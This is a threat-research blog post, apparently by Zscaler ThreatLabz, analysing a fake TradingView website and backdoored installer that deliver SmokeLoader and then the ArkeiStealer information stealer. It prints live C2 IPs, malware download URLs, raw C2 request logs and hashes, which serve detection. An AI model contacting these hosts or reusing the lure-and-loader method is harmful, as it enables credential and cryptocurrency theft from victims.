Threats continue to evolve in their complexity and scale as cyber criminals regularly come up with new ideas and find ways to target their victims.
Modern information stealer families such as RedLine, RecordBreaker, ArkeiStealer, Vidar, Satacom, BatLoader are often sold through Malware-as-a-Service (MaaS) models and they continuously update with their varying initial attack vectors.
ThreatLabz discovered that threat actors are now distributing ArkeiStealer through Windows Installer binaries which masquerade as a trading application. The trading application is backdoored with the SmokeLoader downloader which further downloads an information stealer. In May 2021 in a similar campaign, ThreatLabz identified a fake TradingView website and backdoored TradingView application associated with the MineBridge RAT campaign [1].
Key Points
The ThreatLabz was able to flag malicious activity to an IP address based on C2 beaconing characteristics and a low domain and ASN reputation.
It also discovered a recently registered domain spoofing the official TradingView website
It was able to identify that the actual malware was embedded inside TradingView Desktop Application
The actual malware and the C2 IP address flagged were identified as SmokeLoader and ArkeiStealer
Technical Analysis
ThreatLabz identified C2 beaconing events connected to an IP address, and the team started the threat hunting process. Following characteristics were essential in identifying and flagging the C2 beaconing activities:
Frequent C2 beaconing
Low domain reputation
Newly Registered Domain
The process started with the Indicator of Attack (IoA) being flagged and the rest of the process revolved around identifying the TTP of the threat campaign.
The IP address “85.208.136.162” was flagged as an Indicator of Attack. The ThreatLabz Threat Intel team immediately validated the IP address as a SmokeLoader C2, as shown below in the following malware configuration in Figure 1.
Figure 1: SmokeLoader Malware Configuration
During the threat hunting process, the ThreatLabz team analyzed network transactions in a time window around the trigger point to identify the end-to-end attack flow as shown in Figure 2.
Figure 2: Complete end-to-end attack chain, used to deliver SmokeLoader and ArkeiStealer
While reconstructing the end-to-end attack chain, our team has identified 3 TradingView Desktop App download attempts from the following URL:
sxvlww.am.files.1drv.com/y4mqgb...ktaq/tradingvlev_x32_x64bit.zip?download&psid=1
Further analysis revealed the victim searching for the TradingView Desktop Application on the DuckDuckGo search engine, as shown below in Figure 3.
Figure 3: TradingView search results with SEO poisoned results
On October 6th, 2022, the threat actors registered the domain “tradingview[.]business”, a look-alike of the legitimate website “tradingview[.]com”. At first glance, “tradingview[.]business” looks almost identical to the legitimate website.
While the real website allows users to download clients for Windows, macOS and Linux platforms, the fake website only offers a Windows application. The download link for the malicious TradingView Desktop Windows application was placed on the homepage as shown in Figure 4.
Figure 4: Legitimate vs. Fake TradingView website
The official and latest version of the TradingView Desktop Application was launched on October 25 2022. The malicious website, however, was registered prior to this on October 6 2022 in anticipation of the release; and the malicious TradingView Desktop Application was launched on October 31, 2022, shortly after the official release. This indicates that the threat actors are diligent in identifying and preparing for such opportunities ahead of time. In addition, they are extremely quick in developing and deploying the attack.
Comparing Whois data for both websites, we quickly validated the malicious intent of the fake website. While the original website’s Whois record is legitimate, the fake website redacts most of its registration details as shown in Figure 5.
Figure 5: WHOIS records for the legitimate and fake TradingView domain
The download link (hxxps://tradingview[.]business/download.php) on the attacker-controlled domain leads to the download of a malicious Windows Installer from the following URL:
sxvlww[.]am[.]files[.]1drv[.]com/y4mqgbxmxiwuw8zm66u0rrrpceovu5hvhzmpooyrgnaaafadcqoiy-b3zjggi68kx_kt1c99vy4av6z5hznc6gumfg9hrnozccxmfiifzy6qf0rsqexsduxn06mtqzcccwb_iek8lvhu0wi-zupdr4sjpfack_tipf0psgzy5qw6ryzjdc8ny-zclsu716jxa7l1sss6r2jhl7lcdijpcktaq/tradingvlev_x32_x64bit.zip?download&psid=1
Note:
We noticed that the download URL responds with the malicious Windows Installer only if the user-agent string in the HTTP request headers corresponds to the Windows 10 operating system. Otherwise, it responds with HTTP 404 error.
Performing technical analysis, we inspected the malicious TradingView Windows Desktop Application with the following information:
Name: TradingVlev_x32_x64bit.exe
MD5: 467d42eca35c0571c30d3f20700d9dff
SHA1: e26512838e6ffb8af84743ae37821694cd380003
SHA256: 9abdfcea109db4763065fee6d3e87299f03f57dba0307c67ad10cd86f0f2acf3
The installer is an executable which masquerades as the TradingView Desktop Windows application and is digitally signed by AVG Technologies USA, LLC. The thumbprint of the digital signature is the following:
ThumbPrint: 63fb7fe4f171bd6dde774ae9365d91ac132616af
CN = AVG Technologies USA, LLC
OU = RE stapler cistodc
O = AVG Technologies USA, LLC
L = Newton
S = North Carolina
C = US
Here, we compare the legitimate and fake TradingView Desktop application signatures.
Figure 6: Legitimate vs. Fake TradingView Desktop applications
Upon execution, this installer shows a Graphical User Interface (GUI) which spoofs the TradingView application while it performs malicious activities in the background. It drops a SmokeLoader DLL named “Scintilla.DLL” in the same folder as the TradingView installation folder. The SmokeLoader DLL then creates a copy of itself with the name “bot.exe” on the user’s desktop.
SmokeLoader then immediately starts beaconing out to its C2 at the IP address “85.208.136.162” and receives a few download tasks, as shown below:
212[.]8[.]246[.]70/builds/still[.]exe - 16857afad0b6c40469e5d9d9b63a2927
212[.]8[.]246[.]70/builds/still[.]exe - 55552ed60bddd332eee8a23f0494174f
212[.]8[.]246[.]70/builds/installer[.]exe - 4d7f538bf21bf0c42fee87d28d3f3079
212[.]8[.]246[.]70/build/bot[.]exe - 0743250f8bb1a0baa01affcfd963d171
ZScaler ThreatLabz has identified all 4 payloads as ArkeiStealer. ArkeiStealer is an information stealer malware family that was first identified in May 2018. ArkeiStealer is a stealthy and flexible information stealer that is known to harvest confidential data from web browsers, cryptocurrency wallets, and search files for attacker-defined patterns. ArkeiStealer was later forked to create a new variant named Vidar Stealer.
This ArkeiStealer payload first obtains its configuration file from the C2 as shown below:
GET /1769 HTTP/1.1
Host: 95.217.31.208
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Nov 2022 15:21:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
1,1,0,1,0,30e8151b350f29168e37e1eea06ed1b4,1,1,1,0,0,Default;%DOCUMENTS%;.txt;50;4;movies:music:mp3:exe;DESKTOP;%DESKTOP%;.txt;50;4;movies:music:mp3:exe;
The ArkeiStealer configuration carries multiple flags. It performs distinct malicious activities depending on the flags that are set in the configuration. The usage of a dynamic configuration provides flexibility to extend the malware’s capabilities at any stage of the campaign.
As shown below, ArkeiStealer immediately begins downloading well-known and legitimate DLLs in a ZIP bundle that are required to fully execute its tasks.
GET /547345733334.zip HTTP/1.1
Host: 95.217.31.208
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 26 Nov 2022 15:21:14 GMT
Content-Type: application/zip
Content-Length: 2685679
Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
Connection: keep-alive
ETag: “631f30d3-28faef”
Accept-Ranges: bytes
These DLLs are typically used by ArkeiStealer to read information from web browsers. ArkeiStealer downloads and stores below DLLs into the %\ProgramData% directory.
Name
Description
sqlite3.dll
SQLite Database Management DLL
freebl3.dll
Freebl Network Security Service DLL for Mozilla Firefox
mozglue.dll
Browser Library for Mozilla Firefox
nss3.dll
Network System Service DLL for Mozilla Firefox
softokn3.dll
Part of Network Security Service for Mozilla Firefox
msvcp140.dll
MS Visual Studio component
vcruntime140.dll
Runtime Library for Visual Studio
Conclusions
Information stealing is extremely rewarding for threat actors especially when storing financial and personal information in web browsers is becoming common. Use of legitimate DLL components to perform browser information enumeration and use of dynamic configuration allows ArkeiStealer threat actors to tailor their operation and choose the information they want to steal from the victim.
At Zscaler, ThreatLabz team works closely with security research, security engineering and ML scientists to develop tools that augment and empower security teams in tackling complex and evasive threats. After successfully detecting C2 traffic to a malicious server, it was further passed to the Threat Hunting team for end-to-end atack chain construction. The team successfully created an end-to-end attack chain identifying all infection stages which consisted of a DuckDuckGo search, a fake TradingView website, a backdoored TradingView Windows application download, SmokeLoader C2 beaconing and the ArkeiStealer download and C2 beaconing.
ZScaler Cloud Sandbox Report
Figure 7: ArkeiStealer Cloud Sandbox Report
In addition to cloud sandbox detections, Zscaler’s multilayered cloud security platform detects indicators at various levels. The Machine Learning Threat Detection Model assists in identifying emerging threats, automatically blocking those with the highest risk scores, and ranking suspicious candidates for further review.
Win32.Backdoor.Smokeloader
Win32.Pws.Arkeistealer
MITRE ATT&CK TTP Mapping
ID
Tactic
Technique
T1203
Exploitation for Client Execution
Benign windows process is dropping new PE files
T1574.002
DLL Side-Loading
Tries to load missing DLLs
T1055
Privilege Escalation
Injects code into the Windows Explorer
T1036
Defense Evasion
Creates files inside the user directory
T1070.004
File Deletion
Deletes itself after installation
T1497
Virtualization/Sandbox Evasion
Checks for kernel code integrity
T1564.001
Hidden Files and Directories
Hides that the sample has been downloaded from the Internet
T1010
Discovery
Application Window Discovery
T1057
Process Discovery
Verifies the name of parent process
T1082
System Information Discovery
Gathers system OS version info
T1518.001
Security Software Discovery
Checks if the current machine is a virtual machine
Checks if the current process is being debugged
T1071
Application Layer Protocol: Web protocol
Posts data to web server
C2 URLs/IPs found in malware configuration
T1095
Non-Application Layer Protocol:
Tries to download or post to a non-existing http route
T1105
Ingress Tool Transfer
Some HTTP requests failed with 404. Part of communication protocol
Indicators of Compromise
Indicators
Description
TradingVlev_x32_x64bit.zip
Fake TradingView Desktop Application Download
fc99ea424df48f2b661219b71f33b979
MD5 of Fake TradingView Desktop Application
1a70718eefa2aef42f4b09577aea7b43ff874e02
SHA1 of Fake TradingView Desktop Application
f4c166dddefd29eb457d0a7b426928b1123626c6c1568bc998440dac72a816b7
SHA256 of Fake TradingView Desktop Application
TradingVlev_x32_x64bit.exe
Fake TradingView Desktop Application
467d42eca35c0571c30d3f20700d9dff
MD5 of Fake TradingView Desktop Application
e26512838e6ffb8af84743ae37821694cd380003
SHA1 of Fake TradingView Desktop Application
9abdfcea109db4763065fee6d3e87299f03f57dba0307c67ad10cd86f0f2acf3
SHA256 of Fake TradingView Desktop Application
85.208.136.162
SmokeLoader C2
sxvlww.am.files.1drv.com
Fake TradingView Application Distribution Domain
tradingview.business
Fake TradingView look-alike website
hxxps://tradingview[.]business/download.php
Fake TradingView download URL
212[.]8[.]246[.]70/builds/still[.]exe
ArkeiStealer download URL
212[.]8[.]246[.]70/builds/installer[.]exe
ArkeiStealer download URL
212[.]8[.]246[.]70/builds/bot[.]exe
ArkeiStealer download URL
4d7f538bf21bf0c42fee87d28d3f3079
ArkeiStealer payload
55552ed60bddd332eee8a23f0494174f
ArkeiStealer payload
16857afad0b6c40469e5d9d9b63a2927
ArkeiStealer payload
0743250f8bb1a0baa01affcfd963d171
ArkeiStealer payload
References
[1] “Demystifying the full attack chain of MineBridge RAT”, https://www.zscaler.com/blogs/security-research/demystifying-full-attack-chain-minebridge-rat
Article Link: https://www.zscaler.com/blog/security-research/trade-with-caution